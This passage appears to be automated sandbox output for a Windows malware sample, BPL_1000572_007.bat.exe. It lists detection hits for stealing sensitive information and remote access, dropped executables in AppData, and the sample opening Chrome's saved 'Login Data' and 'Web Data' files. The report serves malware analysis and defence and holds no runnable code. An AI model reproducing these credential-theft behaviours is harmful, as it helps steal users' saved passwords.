Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Queries volume information: C:\Users\user\AppData\Roaming\note\pdf.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Queries volume information: C:\Users\user\AppData\Roaming\note\pdf.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe VolumeInformation
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: Amcache.hve.21.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe

Stealing of Sensitive Information

barindex
Source: Yara match File source: Process Memory Space: BPL_1000572_007.bat.exe PID: 5820, type: MEMORYSTR
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.BPL_1000572_007.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.3a55e10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.3a55e10.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000000.435627430.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.476692694.0000000003969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.478754600.0000000003A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.477582382.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BPL_1000572_007.bat.exe PID: 5820, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: BPL_1000572_007.bat.exe PID: 1952, type: MEMORYSTR
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior

Remote Access Functionality

barindex
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.BPL_1000572_007.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.3a55e10.3.raw.unpack, type: UNPACKEDPE